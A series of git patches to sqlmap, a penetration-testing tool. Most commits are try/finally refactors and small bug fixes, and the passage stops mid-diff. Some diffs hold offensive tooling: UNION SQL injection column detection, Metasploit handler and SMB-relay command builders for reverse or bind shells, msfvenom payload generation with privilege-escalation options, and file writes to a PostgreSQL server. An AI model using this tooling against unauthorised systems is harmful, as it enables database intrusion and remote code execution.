     return kb.nullConnection is not None
 
diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index 52f2c8c28..d5793767c 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -501,47 +501,49 @@ def start():
                         kb.testedParams.add(paramKey)
 
                         if testSqlInj:
-                            if place == PLACE.COOKIE:
-                                pushValue(kb.mergeCookies)
-                                kb.mergeCookies = False
+                            try:
+                                if place == PLACE.COOKIE:
+                                    pushValue(kb.mergeCookies)
+                                    kb.mergeCookies = False
 
-                            check = heuristicCheckSqlInjection(place, parameter)
+                                check = heuristicCheckSqlInjection(place, parameter)
 
-                            if check != HEURISTIC_TEST.POSITIVE:
-                                if conf.smart or (kb.ignoreCasted and check == HEURISTIC_TEST.CASTED):
-                                    infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
-                                    logger.info(infoMsg)
-                                    continue
+                                if check != HEURISTIC_TEST.POSITIVE:
+                                    if conf.smart or (kb.ignoreCasted and check == HEURISTIC_TEST.CASTED):
+                                        infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
+                                        logger.info(infoMsg)
+                                        continue
 
-                            infoMsg = "testing for SQL injection on %s " % paramType
-                            infoMsg += "parameter '%s'" % parameter
-                            logger.info(infoMsg)
+                                infoMsg = "testing for SQL injection on %s " % paramType
+                                infoMsg += "parameter '%s'" % parameter
+                                logger.info(infoMsg)
 
-                            injection = checkSqlInjection(place, parameter, value)
-                            proceed = not kb.endDetection
+                                injection = checkSqlInjection(place, parameter, value)
+                                proceed = not kb.endDetection
 
-                            if injection is not None and injection.place is not None:
-                                kb.injections.append(injection)
+                                if injection is not None and injection.place is not None:
+                                    kb.injections.append(injection)
 
-                                # In case when user wants to end detection phase (Ctrl+C)
-                                if not proceed:
-                                    break
+                                    # In case when user wants to end detection phase (Ctrl+C)
+                                    if not proceed:
+                                        break
 
-                                msg = "%s parameter '%s' " % (injection.place, injection.parameter)
-                                msg += "is vulnerable. Do you want to keep testing the others (if any)? [y/N] "
-                                test = readInput(msg, default="N")
+                                    msg = "%s parameter '%s' " % (injection.place, injection.parameter)
+                                    msg += "is vulnerable. Do you want to keep testing the others (if any)? [y/N] "
+                                    test = readInput(msg, default="N")
 
-                                if test[0] not in ("y", "Y"):
-                                    proceed = False
-                                    paramKey = (conf.hostname, conf.path, None, None)
-                                    kb.testedParams.add(paramKey)
-                            else:
-                                warnMsg = "%s parameter '%s' is not " % (paramType, parameter)
-                                warnMsg += "injectable"
-                                logger.warn(warnMsg)
+                                    if test[0] not in ("y", "Y"):
+                                        proceed = False
+                                        paramKey = (conf.hostname, conf.path, None, None)
+                                        kb.testedParams.add(paramKey)
+                                else:
+                                    warnMsg = "%s parameter '%s' is not " % (paramType, parameter)
+                                    warnMsg += "injectable"
+                                    logger.warn(warnMsg)
 
-                            if place == PLACE.COOKIE:
-                                kb.mergeCookies = popValue()
+                            finally:
+                                if place == PLACE.COOKIE:
+                                    kb.mergeCookies = popValue()
 
             if len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None):
                 if kb.vainRun and not conf.multipleTargets:
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 94ce9887e..7b05f8385 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -1030,23 +1030,24 @@ class Connect(object):
         if kb.nullConnection and not content and not response and not timeBasedCompare:
             noteResponseTime = False
 
-            pushValue(kb.pageCompress)
-            kb.pageCompress = False
+            try:
+                pushValue(kb.pageCompress)
+                kb.pageCompress = False
 
-            if kb.nullConnection == NULLCONNECTION.HEAD:
-                method = HTTPMETHOD.HEAD
-            elif kb.nullConnection == NULLCONNECTION.RANGE:
-                auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1"
+                if kb.nullConnection == NULLCONNECTION.HEAD:
+                    method = HTTPMETHOD.HEAD
+                elif kb.nullConnection == NULLCONNECTION.RANGE:
+                    auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1"
 
-            _, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))
+                _, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))
 
-            if headers:
-                if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers:
-                    pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH])
-                elif kb.nullConnection == NULLCONNECTION.RANGE and HTTP_HEADER.CONTENT_RANGE in headers:
-                    pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:])
-
-            kb.pageCompress = popValue()
+                if headers:
+                    if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers:
+                        pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH])
+                    elif kb.nullConnection == NULLCONNECTION.RANGE and HTTP_HEADER.CONTENT_RANGE in headers:
+                        pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:])
+            finally:
+                kb.pageCompress = popValue()
 
         if not pageLength:
             try:
diff --git a/lib/request/inject.py b/lib/request/inject.py
index 74d83efc9..b12517ce4 100644
--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@@ -391,11 +391,13 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
                             warnMsg += ". Falling back to partial UNION technique"
                             singleTimeWarnMessage(warnMsg)
 
-                            pushValue(kb.forcePartialUnion)
-                            kb.forcePartialUnion = True
-                            value = _goUnion(query, unpack, dump)
-                            found = (value is not None) or (value is None and expectingNone)
-                            kb.forcePartialUnion = popValue()
+                            try:
+                                pushValue(kb.forcePartialUnion)
+                                kb.forcePartialUnion = True
+                                value = _goUnion(query, unpack, dump)
+                                found = (value is not None) or (value is None and expectingNone)
+                            finally:
+                                kb.forcePartialUnion = popValue()
                         else:
                             singleTimeWarnMessage(warnMsg)
 
diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py
index b39bd6b5a..a498bf08c 100644
--- a/lib/techniques/union/test.py
+++ b/lib/techniques/union/test.py
@@ -81,73 +81,74 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
 
             return found
 
-    pushValue(kb.errorIsNone)
-    items, ratios = [], []
-    kb.errorIsNone = False
-    lowerCount, upperCount = conf.uColsStart, conf.uColsStop
+    try:
+        pushValue(kb.errorIsNone)
+        items, ratios = [], []
+        kb.errorIsNone = False
+        lowerCount, upperCount = conf.uColsStart, conf.uColsStop
 
-    if lowerCount == 1:
-        found = kb.orderByColumns or _orderByTechnique()
-        if found:
-            kb.orderByColumns = found
-            infoMsg = "target URL appears to have %d column%s in query" % (found, 's' if found > 1 else "")
-            singleTimeLogMessage(infoMsg)
-            return found
+        if lowerCount == 1:
+            found = kb.orderByColumns or _orderByTechnique()
+            if found:
+                kb.orderByColumns = found
+                infoMsg = "target URL appears to have %d column%s in query" % (found, 's' if found > 1 else "")
+                singleTimeLogMessage(infoMsg)
+                return found
 
-    if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES:
-        upperCount = lowerCount + MIN_UNION_RESPONSES
+        if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES:
+            upperCount = lowerCount + MIN_UNION_RESPONSES
 
-    min_, max_ = MAX_RATIO, MIN_RATIO
-    pages = {}
+        min_, max_ = MAX_RATIO, MIN_RATIO
+        pages = {}
+
+        for count in xrange(lowerCount, upperCount + 1):
+            query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)
+            payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
+            page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
+            if not isNullValue(kb.uChar):
+                pages[count] = page
+            ratio = comparison(page, headers, getRatioValue=True) or MIN_RATIO
+            ratios.append(ratio)
+            min_, max_ = min(min_, ratio), max(max_, ratio)
+            items.append((count, ratio))
 
-    for count in xrange(lowerCount, upperCount + 1):
-        query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)
-        payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
-        page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
         if not isNullValue(kb.uChar):
-            pages[count] = page
-        ratio = comparison(page, headers, getRatioValue=True) or MIN_RATIO
-        ratios.append(ratio)
-        min_, max_ = min(min_, ratio), max(max_, ratio)
-        items.append((count, ratio))
+            for regex in (kb.uChar, r'>\s*%s\s*<' % kb.uChar):
+                contains = [(count, re.search(regex, page or "", re.IGNORECASE) is not None) for count, page in pages.items()]
+                if len(filter(lambda x: x[1], contains)) == 1:
+                    retVal = filter(lambda x: x[1], contains)[0][0]
+                    break
 
-    if not isNullValue(kb.uChar):
-        for regex in (kb.uChar, r'>\s*%s\s*<' % kb.uChar):
-            contains = [(count, re.search(regex, page or "", re.IGNORECASE) is not None) for count, page in pages.items()]
-            if len(filter(lambda x: x[1], contains)) == 1:
-                retVal = filter(lambda x: x[1], contains)[0][0]
-                break
+        if not retVal:
+            ratios.pop(ratios.index(min_))
+            ratios.pop(ratios.index(max_))
 
-    if not retVal:
-        ratios.pop(ratios.index(min_))
-        ratios.pop(ratios.index(max_))
+            minItem, maxItem = None, None
 
-        minItem, maxItem = None, None
+            for item in items:
+                if item[1] == min_:
+                    minItem = item
+                elif item[1] == max_:
+                    maxItem = item
 
-        for item in items:
-            if item[1] == min_:
-                minItem = item
-            elif item[1] == max_:
-                maxItem = item
+            if all(map(lambda x: x == min_ and x != max_, ratios)):
+                retVal = maxItem[0]
 
-        if all(map(lambda x: x == min_ and x != max_, ratios)):
-            retVal = maxItem[0]
+            elif all(map(lambda x: x != min_ and x == max_, ratios)):
+                retVal = minItem[0]
 
-        elif all(map(lambda x: x != min_ and x == max_, ratios)):
-            retVal = minItem[0]
+            elif abs(max_ - min_) >= MIN_STATISTICAL_RANGE:
+                    deviation = stdev(ratios)
+                    lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation
 
-        elif abs(max_ - min_) >= MIN_STATISTICAL_RANGE:
-                deviation = stdev(ratios)
-                lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation
+                    if min_ < lower:
+                        retVal = minItem[0]
 
-                if min_ < lower:
-                    retVal = minItem[0]
-
-                if max_ > upper:
-                    if retVal is None or abs(max_ - upper) > abs(min_ - lower):
-                        retVal = maxItem[0]
-
-    kb.errorIsNone = popValue()
+                    if max_ > upper:
+                        if retVal is None or abs(max_ - upper) > abs(min_ - lower):
+                            retVal = maxItem[0]
+    finally:
+        kb.errorIsNone = popValue()
 
     if retVal:
         infoMsg = "target URL appears to be UNION injectable with %d columns" % retVal
diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py
index 6fa1295d2..195b2d6a7 100644
--- a/plugins/generic/databases.py
+++ b/plugins/generic/databases.py
@@ -742,32 +742,33 @@ class Databases:
         infoMsg = "enumerating database management system schema"
         logger.info(infoMsg)
 
-        pushValue(conf.db)
-        pushValue(conf.tbl)
-        pushValue(conf.col)
+        try:
+            pushValue(conf.db)
+            pushValue(conf.tbl)
+            pushValue(conf.col)
 
-        kb.data.cachedTables = {}
-        kb.data.cachedColumns = {}
+            kb.data.cachedTables = {}
+            kb.data.cachedColumns = {}
 
-        self.getTables()
+            self.getTables()
 
-        infoMsg = "fetched tables: "
-        infoMsg += ", ".join(["%s" % ", ".join("%s%s%s" % (unsafeSQLIdentificatorNaming(db), ".." if \
-                   Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) \
-                   else ".", unsafeSQLIdentificatorNaming(t)) for t in tbl) for db, tbl in \
-                   kb.data.cachedTables.items()])
-        logger.info(infoMsg)
+            infoMsg = "fetched tables: "
+            infoMsg += ", ".join(["%s" % ", ".join("%s%s%s" % (unsafeSQLIdentificatorNaming(db), ".." if \
+                    Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) \
+                    else ".", unsafeSQLIdentificatorNaming(t)) for t in tbl) for db, tbl in \
+                    kb.data.cachedTables.items()])
+            logger.info(infoMsg)
 
-        for db, tables in kb.data.cachedTables.items():
-            for tbl in tables:
-                conf.db = db
-                conf.tbl = tbl
+            for db, tables in kb.data.cachedTables.items():
+                for tbl in tables:
+                    conf.db = db
+                    conf.tbl = tbl
 
-                self.getColumns()
-
-        conf.col = popValue()
-        conf.tbl = popValue()
-        conf.db = popValue()
+                    self.getColumns()
+        finally:
+            conf.col = popValue()
+            conf.tbl = popValue()
+            conf.db = popValue()
 
         return kb.data.cachedColumns
 

From 2afb5687f697c2d65010a13adecb47eb806bf779 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 20 Jul 2015 15:47:27 +0200
Subject: [PATCH 471/492] Fixes #1307

---
 lib/core/target.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/core/target.py b/lib/core/target.py
index 442a8cd7a..c1bf921bd 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -604,7 +604,7 @@ def _createTargetDirs():
 
             warnMsg = "unable to create regular output directory "
             warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, getUnicode(ex))
-            warnMsg += "Using temporary directory '%s' instead" % tempDir
+            warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir)
             logger.warn(warnMsg)
 
             paths.SQLMAP_OUTPUT_PATH = tempDir
@@ -626,7 +626,7 @@ def _createTargetDirs():
 
             warnMsg = "unable to create output directory "
             warnMsg += "'%s' (%s). " % (conf.outputPath, getUnicode(ex))
-            warnMsg += "Using temporary directory '%s' instead" % tempDir
+            warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir)
             logger.warn(warnMsg)
 
             conf.outputPath = tempDir

From 75ed5f767c2484f53833a225171331465391f714 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 20 Jul 2015 17:03:20 +0200
Subject: [PATCH 472/492] Fixes #1309

---
 lib/takeover/udf.py | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/lib/takeover/udf.py b/lib/takeover/udf.py
index 13ec70dfe..aa10b3c63 100644
--- a/lib/takeover/udf.py
+++ b/lib/takeover/udf.py
@@ -361,6 +361,9 @@ class UDF:
                     warnMsg += "<= %d are allowed" % len(udfList)
                     logger.warn(warnMsg)
 
+            if not isinstance(choice, int):
+                break
+
             cmd = ""
             count = 1
             udfToCall = udfList[choice - 1]

From 358651b19c279c8d0ecdb5c8e68fe6340659a6bf Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 23 Jul 2015 00:41:03 +0200
Subject: [PATCH 473/492] Fixes #1313

---
 lib/core/common.py | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 8f6ca2954..a0255dda4 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2482,7 +2482,9 @@ def extractTextTagContent(page):
     [u'Title', u'foobar']
     """
 
-    page = re.sub(r"(?si)[^\s>]*%s[^<]*" % REFLECTED_VALUE_MARKER, "", page or "")
+    page = page or ""
+    if REFLECTED_VALUE_MARKER in page:
+        page = re.sub(r"(?si)[^\s>]*%s[^\s<]*" % REFLECTED_VALUE_MARKER, "", page)
     return filter(None, (_.group('result').strip() for _ in re.finditer(TEXT_TAG_REGEX, page)))
 
 def trimAlphaNum(value):

From cece2cb12d3397eadd587c9011b7be913868a2c4 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 23 Jul 2015 00:42:29 +0200
Subject: [PATCH 474/492] Minor cosmetics

---
 lib/core/common.py | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/lib/core/common.py b/lib/core/common.py
index a0255dda4..44465c7e8 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2483,8 +2483,10 @@ def extractTextTagContent(page):
     """
 
     page = page or ""
+
     if REFLECTED_VALUE_MARKER in page:
         page = re.sub(r"(?si)[^\s>]*%s[^\s<]*" % REFLECTED_VALUE_MARKER, "", page)
+
     return filter(None, (_.group('result').strip() for _ in re.finditer(TEXT_TAG_REGEX, page)))
 
 def trimAlphaNum(value):

From 58002c5057b547286452db429e15c562bf9465d5 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 23 Jul 2015 09:55:59 +0200
Subject: [PATCH 475/492] Minor cosmetics

---
 lib/controller/checks.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 39c472e73..576d20a0f 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -1012,7 +1012,7 @@ def checkStability():
     like for instance string matching (--string).
     """
 
-    infoMsg = "testing if the target URL is stable. Delay can take up to a second"
+    infoMsg = "testing if the target URL is stable"
     logger.info(infoMsg)
 
     firstPage = kb.originalPage  # set inside checkConnection()

From a905b8d8f55d5e1478912993235685d0ca5d174a Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 23 Jul 2015 10:07:21 +0200
Subject: [PATCH 476/492] Fixes #1312

---
 lib/core/option.py         |  12 ++---
 lib/takeover/metasploit.py | 104 +++++++++++++++++++++++++------------
 2 files changed, 76 insertions(+), 40 deletions(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index 75885f878..b73152469 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -765,12 +765,12 @@ def _setMetasploit():
 
     if conf.msfPath:
         for path in (conf.msfPath, os.path.join(conf.msfPath, "bin")):
-            if all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("", "msfcli", "msfconsole")):
+            if any(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfcli", "msfconsole")):
                 msfEnvPathExists = True
                 if all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfvenom",)):
-                    kb.msfVenom = True
+                    kb.oldMsf = False
                 elif all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfencode", "msfpayload")):
-                    kb.msfVenom = False
+                    kb.oldMsf = True
                 else:
                     msfEnvPathExists = False
                 conf.msfPath = path
@@ -806,9 +806,9 @@ def _setMetasploit():
             if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("", "msfcli", "msfconsole")):
                 msfEnvPathExists = True
                 if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfvenom",)):
-                    kb.msfVenom = True
+                    kb.oldMsf = False
                 elif all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfencode", "msfpayload")):
-                    kb.msfVenom = False
+                    kb.oldMsf = True
                 else:
                     msfEnvPathExists = False
 
@@ -1811,10 +1811,10 @@ def _setKnowledgeBaseAttributes(flushAll=True):
     kb.matchRatio = None
     kb.maxConnectionsFlag = False
     kb.mergeCookies = None
-    kb.msfVenom = False
     kb.multiThreadMode = False
     kb.negativeLogic = False
     kb.nullConnection = None
+    kb.oldMsf = None
     kb.orderByColumns = None
     kb.originalCode = None
     kb.originalPage = None
diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py
index 14364c77d..8717b6c73 100644
--- a/lib/takeover/metasploit.py
+++ b/lib/takeover/metasploit.py
@@ -62,6 +62,7 @@ class Metasploit:
         self.localIP = getLocalIP()
         self.remoteIP = getRemoteIP() or conf.hostname
         self._msfCli = normalizePath(os.path.join(conf.msfPath, "msfcli"))
+        self._msfConsole = normalizePath(os.path.join(conf.msfPath, "msfconsole"))
         self._msfEncode = normalizePath(os.path.join(conf.msfPath, "msfencode"))
         self._msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload"))
         self._msfVenom = normalizePath(os.path.join(conf.msfPath, "msfvenom"))
@@ -78,6 +79,7 @@ class Metasploit:
                     if _ == old:
                         break
             self._msfCli = "%s & ruby %s" % (_, self._msfCli)
+            self._msfConsole = "%s & ruby %s" % (_, self._msfConsole)
             self._msfEncode = "ruby %s" % self._msfEncode
             self._msfPayload = "%s & ruby %s" % (_, self._msfPayload)
             self._msfVenom = "%s & ruby %s" % (_, self._msfVenom)
@@ -329,45 +331,79 @@ class Metasploit:
         self.payloadConnStr = "%s/%s" % (self.payloadStr, self.connectionStr)
 
     def _forgeMsfCliCmd(self, exitfunc="process"):
-        self._cliCmd = "%s multi/handler PAYLOAD=%s" % (self._msfCli, self.payloadConnStr)
-        self._cliCmd += " EXITFUNC=%s" % exitfunc
-        self._cliCmd += " LPORT=%s" % self.portStr
+        if kb.oldMsf:
+            self._cliCmd = "%s multi/handler PAYLOAD=%s" % (self._msfCli, self.payloadConnStr)
+            self._cliCmd += " EXITFUNC=%s" % exitfunc
+            self._cliCmd += " LPORT=%s" % self.portStr
 
-        if self.connectionStr.startswith("bind"):
-            self._cliCmd += " RHOST=%s" % self.rhostStr
-        elif self.connectionStr.startswith("reverse"):
-            self._cliCmd += " LHOST=%s" % self.lhostStr
+            if self.connectionStr.startswith("bind"):
+                self._cliCmd += " RHOST=%s" % self.rhostStr
+            elif self.connectionStr.startswith("reverse"):
+                self._cliCmd += " LHOST=%s" % self.lhostStr
+            else:
+                raise SqlmapDataException("unexpected connection type")
+
+            if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject":
+                self._cliCmd += " DisableCourtesyShell=true"
+
+            self._cliCmd += " E"
         else:
-            raise SqlmapDataException("unexpected connection type")
+            self._cliCmd = "%s -x 'use multi/handler; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr)
+            self._cliCmd += "; set EXITFUNC %s" % exitfunc
+            self._cliCmd += "; set LPORT %s" % self.portStr
 
-        if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject":
-            self._cliCmd += " DisableCourtesyShell=true"
+            if self.connectionStr.startswith("bind"):
+                self._cliCmd += "; set RHOST %s" % self.rhostStr
+            elif self.connectionStr.startswith("reverse"):
+                self._cliCmd += "; set LHOST %s" % self.lhostStr
+            else:
+                raise SqlmapDataException("unexpected connection type")
 
-        self._cliCmd += " E"
+            if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject":
+                self._cliCmd += "; set DisableCourtesyShell true"
+
+            self._cliCmd += "; exploit'"
 
     def _forgeMsfCliCmdForSmbrelay(self):
         self._prepareIngredients(encode=False)
 
-        self._cliCmd = "%s windows/smb/smb_relay PAYLOAD=%s" % (self._msfCli, self.payloadConnStr)
-        self._cliCmd += " EXITFUNC=thread"
-        self._cliCmd += " LPORT=%s" % self.portStr
-        self._cliCmd += " SRVHOST=%s" % self.lhostStr
-        self._cliCmd += " SRVPORT=%s" % self._selectSMBPort()
+        if kb.oldMsf:
+            self._cliCmd = "%s windows/smb/smb_relay PAYLOAD=%s" % (self._msfCli, self.payloadConnStr)
+            self._cliCmd += " EXITFUNC=thread"
+            self._cliCmd += " LPORT=%s" % self.portStr
+            self._cliCmd += " SRVHOST=%s" % self.lhostStr
+            self._cliCmd += " SRVPORT=%s" % self._selectSMBPort()
 
-        if self.connectionStr.startswith("bind"):
-            self._cliCmd += " RHOST=%s" % self.rhostStr
-        elif self.connectionStr.startswith("reverse"):
-            self._cliCmd += " LHOST=%s" % self.lhostStr
+            if self.connectionStr.startswith("bind"):
+                self._cliCmd += " RHOST=%s" % self.rhostStr
+            elif self.connectionStr.startswith("reverse"):
+                self._cliCmd += " LHOST=%s" % self.lhostStr
+            else:
+                raise SqlmapDataException("unexpected connection type")
+
+            self._cliCmd += " E"
         else:
-            raise SqlmapDataException("unexpected connection type")
+            self._cliCmd = "%s -x 'use windows/smb/smb_relay; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr)
+            self._cliCmd += "; set EXITFUNC thread"
+            self._cliCmd += "; set LPORT %s" % self.portStr
+            self._cliCmd += "; set SRVHOST %s" % self.lhostStr
+            self._cliCmd += "; set SRVPORT %s" % self._selectSMBPort()
 
-        self._cliCmd += " E"
+            if self.connectionStr.startswith("bind"):
+                self._cliCmd += "; set RHOST %s" % self.rhostStr
+            elif self.connectionStr.startswith("reverse"):
+                self._cliCmd += "; set LHOST %s" % self.lhostStr
+            else:
+                raise SqlmapDataException("unexpected connection type")
+
+            self._cliCmd += "; exploit'"
 
     def _forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None):
-        if kb.msfVenom:
-            self._payloadCmd = "%s -p" % self._msfVenom
-        else:
+        if kb.oldMsf:
             self._payloadCmd = self._msfPayload
+        else:
+            self._payloadCmd = "%s -p" % self._msfVenom
+
         self._payloadCmd += " %s" % self.payloadConnStr
         self._payloadCmd += " EXITFUNC=%s" % exitfunc
         self._payloadCmd += " LPORT=%s" % self.portStr
@@ -380,15 +416,7 @@ class Metasploit:
         if Backend.isOs(OS.LINUX) and conf.privEsc:
             self._payloadCmd += " PrependChrootBreak=true PrependSetuid=true"
 
-        if kb.msfVenom:
-            if extra == "BufferRegister=EAX":
-                self._payloadCmd += " -a x86 -e %s -f %s > \"%s\"" % (self.encoderStr, format, outFile)
-
-                if extra is not None:
-                    self._payloadCmd += " %s" % extra
-            else:
-                self._payloadCmd += " -f exe > \"%s\"" % outFile
-        else:
+        if kb.oldMsf:
             if extra == "BufferRegister=EAX":
                 self._payloadCmd += " R | %s -a x86 -e %s -o \"%s\" -t %s" % (self._msfEncode, self.encoderStr, outFile, format)
 
@@ -396,6 +424,14 @@ class Metasploit:
                     self._payloadCmd += " %s" % extra
             else:
                 self._payloadCmd += " X > \"%s\"" % outFile
+        else:
+            if extra == "BufferRegister=EAX":
+                self._payloadCmd += " -a x86 -e %s -f %s > \"%s\"" % (self.encoderStr, format, outFile)
+
+                if extra is not None:
+                    self._payloadCmd += " %s" % extra
+            else:
+                self._payloadCmd += " -f exe > \"%s\"" % outFile
 
     def _runMsfCliSmbrelay(self):
         self._forgeMsfCliCmdForSmbrelay()

From 8df3d7a6fa97c25605f3637da7aad54a55fe8782 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 24 Jul 2015 12:11:12 +0200
Subject: [PATCH 477/492] Minor enhancement for beep

---
 extra/beep/beep.py | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/extra/beep/beep.py b/extra/beep/beep.py
index b46036b2a..cd8ef9be5 100644
--- a/extra/beep/beep.py
+++ b/extra/beep/beep.py
@@ -45,6 +45,10 @@ def _win_wav_play(filename):
     winsound.PlaySound(filename, winsound.SND_FILENAME)
 
 def _linux_wav_play(filename):
+    for _ in ("aplay", "paplay", "play"):
+        if not os.system("%s '%s' 2>/dev/null" % (_, filename)):
+            return
+
     import ctypes
 
     PA_STREAM_PLAYBACK = 1

From b6ea2fdb07390de62b5b37fe825b4fdc7632ad89 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 24 Jul 2015 14:56:45 +0200
Subject: [PATCH 478/492] Fixes #1170

---
 lib/core/settings.py                  |  3 ++
 plugins/dbms/postgresql/filesystem.py | 66 ++++++---------------------
 plugins/generic/filesystem.py         | 21 ++++++---
 3 files changed, 31 insertions(+), 59 deletions(-)

diff --git a/lib/core/settings.py b/lib/core/settings.py
index a356390d9..325855514 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -611,6 +611,9 @@ MIN_ENCODED_LEN_CHECK = 5
 # Timeout in seconds in which Metasploit remote session has to be initialized
 METASPLOIT_SESSION_TIMEOUT = 300
 
+# Reference: http://www.postgresql.org/docs/9.0/static/catalog-pg-largeobject.html
+LOBLKSIZE = 2048
+
 # Suffix used to mark variables having keyword names
 EVALCODE_KEYWORD_SUFFIX = "_KEYWORD"
 
diff --git a/plugins/dbms/postgresql/filesystem.py b/plugins/dbms/postgresql/filesystem.py
index e45be204b..d3bc2516e 100644
--- a/plugins/dbms/postgresql/filesystem.py
+++ b/plugins/dbms/postgresql/filesystem.py
@@ -11,12 +11,14 @@ from lib.core.common import randomInt
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.exception import SqlmapUnsupportedFeatureException
+from lib.core.settings import LOBLKSIZE
 from lib.request import inject
 from plugins.generic.filesystem import Filesystem as GenericFilesystem
 
 class Filesystem(GenericFilesystem):
     def __init__(self):
         self.oid = None
+        self.page = None
 
         GenericFilesystem.__init__(self)
 
@@ -35,34 +37,13 @@ class Filesystem(GenericFilesystem):
 
     def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
         wFileSize = os.path.getsize(wFile)
-
-        if wFileSize > 8192:
-            errMsg = "on PostgreSQL it is not possible to write files "
-            errMsg += "bigger than 8192 bytes at the moment"
-            raise SqlmapUnsupportedFeatureException(errMsg)
+        content = open(wFile, "rb").read()
 
         self.oid = randomInt()
-
-        debugMsg = "creating a support table to write the base64 "
-        debugMsg += "encoded file to"
-        logger.debug(debugMsg)
+        self.page = 0
 
         self.createSupportTbl(self.fileTblName, self.tblField, "text")
 
-        logger.debug("encoding file to its base64 string value")
-        fcEncodedList = self.fileEncode(wFile, "base64", False)
-
-        debugMsg = "forging SQL statements to write the base64 "
-        debugMsg += "encoded file to the support table"
-        logger.debug(debugMsg)
-
